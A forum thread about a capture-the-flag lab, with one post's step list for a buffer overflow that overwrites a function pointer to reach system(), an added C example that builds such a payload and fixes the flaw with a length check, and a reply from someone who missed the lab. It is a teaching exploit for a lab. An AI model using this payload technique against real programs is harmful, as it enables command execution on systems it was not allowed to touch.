Forum Discussion
Trick or Treat on Specter Street: Morphy’s Mansion
Yes, immervivesolver. Took me a few days and assistance from AI to solve this.
The strategy was to use a No-ROP function-pointer overwrite.
Follow the steps below:
1. Check Backend Health
curl -s http://x.x.x.x/api/health
2. Analyze Vulnerable Binary:
nm -C ./move_logger | grep rotate_old_logs
objdump -d ./move_logger | awk '/<system@plt>/{print; getline; print}'
3. Confirm Stack Layout in GDB
(use PEDA and execute: p &moves, p &log to find the buffer size)
4. Craft Overflow Payload:
Payload: e4aaaaaaaaaaaaaaXXXXXX0000000000
5. Exploit via API - curl POST
6. Retrieve Token by using curl
Hope that helps.
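An added example in C, not code from the post above or from the challenge binary, that models the No-ROP function-pointer overwrite the post describes: a fixed-size buffer sits directly in front of a function pointer, an unchecked copy overruns the buffer, and the payload places a command string first, pads up to the pointer, then writes the target address little-endian. Everything here is an assumption chosen to mirror the post's names: the struct move_ctx with a 16-byte moves buffer followed by the pointer log, rotate_old_logs as the legitimate callee, fake_system standing in for system@plt (so nothing is actually executed), and a little-endian 64-bit target. The offset passed to build_payload is the value you would get from (p &log) - (p &moves) in GDB; the address is the one objdump shows for system@plt.

```c
/* Added example: function-pointer overwrite without ROP. Names and layout are
 * assumptions that mirror the forum post, not the real move_logger binary. */
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define MOVES_LEN 16

/* Assumed layout: buffer immediately followed by the pointer that gets called.
 * On a real target this is what p &moves and p &log in GDB reveal. */
struct move_ctx {
    char moves[MOVES_LEN];
    void (*log)(const char *);
};

static char last_call[64];   /* records which function ran and with what argument */

/* Legitimate callee (name assumed from the post's nm grep). */
static void rotate_old_logs(const char *entry) {
    snprintf(last_call, sizeof last_call, "rotate:%s", entry);
}

/* Stand-in for system@plt so the example runs nothing; in a real exploit the
 * payload carries the PLT address printed by objdump instead. */
static void fake_system(const char *cmd) {
    snprintf(last_call, sizeof last_call, "system:%s", cmd);
}

/* Vulnerable handler: copies an attacker-chosen length into a 16-byte buffer,
 * then calls through the pointer that sits right behind it. */
static void log_move_vuln(struct move_ctx *ctx, const unsigned char *data, size_t len) {
    memcpy(ctx->moves, data, len);   /* no bounds check: len > MOVES_LEN clobbers ctx->log */
    ctx->log(ctx->moves);            /* argument is the buffer, so the command comes first */
}

/* Hardened handler: rejects anything that does not fit with room for the NUL. */
static int log_move_safe(struct move_ctx *ctx, const unsigned char *data, size_t len) {
    if (len >= MOVES_LEN) return -1;
    memcpy(ctx->moves, data, len);
    ctx->moves[len] = '\0';
    ctx->log(ctx->moves);
    return 0;
}

/* Payload = "cmd\0" + 'a' padding up to `offset` + target address (8 bytes, little-endian).
 * `offset` is (p &log) - (p &moves); `target` is the system@plt address from objdump. */
static size_t build_payload(unsigned char *out, size_t out_cap, const char *cmd,
                            size_t offset, uintptr_t target) {
    size_t cmd_len = strlen(cmd) + 1;        /* keep the NUL so system() sees only cmd */
    if (cmd_len > offset || offset + sizeof target > out_cap) return 0;
    memset(out, 'a', offset);
    memcpy(out, cmd, cmd_len);
    for (size_t i = 0; i < sizeof target; i++)  /* little-endian, assumed x86-64 style */
        out[offset + i] = (unsigned char)(target >> (8 * i));
    return offset + sizeof target;
}

/* Fires the payload at the vulnerable handler; returns the recorded call. */
const char *exploit_vuln(void) {
    struct move_ctx ctx = { "", rotate_old_logs };
    unsigned char payload[sizeof ctx];
    size_t n = build_payload(payload, sizeof payload, "id",
                             offsetof(struct move_ctx, log), (uintptr_t)fake_system);
    log_move_vuln(&ctx, payload, n);
    return last_call;   /* "system:id" once the pointer has been hijacked */
}

/* Same payload against the hardened handler: 1 if rejected with the pointer intact. */
int safe_rejects_payload(void) {
    struct move_ctx ctx = { "", rotate_old_logs };
    unsigned char payload[sizeof ctx];
    size_t n = build_payload(payload, sizeof payload, "id",
                             offsetof(struct move_ctx, log), (uintptr_t)fake_system);
    int rc = log_move_safe(&ctx, payload, n);
    return (rc == -1 && ctx.log == rotate_old_logs) ? 1 : 0;
}

int main(void) {
    unsigned char buf[32];
    size_t n = build_payload(buf, sizeof buf, "id", 16, (uintptr_t)0x401030);  /* constructed address */
    printf("payload (%zu bytes): ", n);
    for (size_t i = 0; i < n; i++) printf("%02x", buf[i]);
    printf("\nvulnerable handler: %s\nhardened handler rejects: %d\n",
           exploit_vuln(), safe_rejects_payload());
    return 0;
}
```

The hex string main prints is the form you would URL- or JSON-encode into the POST body; the NUL after the command and the zero high bytes of the address are why a raw text field often cannot carry it and a binary-safe encoding is needed. The hardened variant shows the check a maintainer would add: the length test before the copy is the whole fix, since a pointer that cannot be overwritten cannot be redirected.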
Wow, this is exactly what I'd have needed!
All I needed was to finish this one task and I would have finished the lab, but I only have access to the platform one month a year (October, Cybersecurity Month...).
Next time!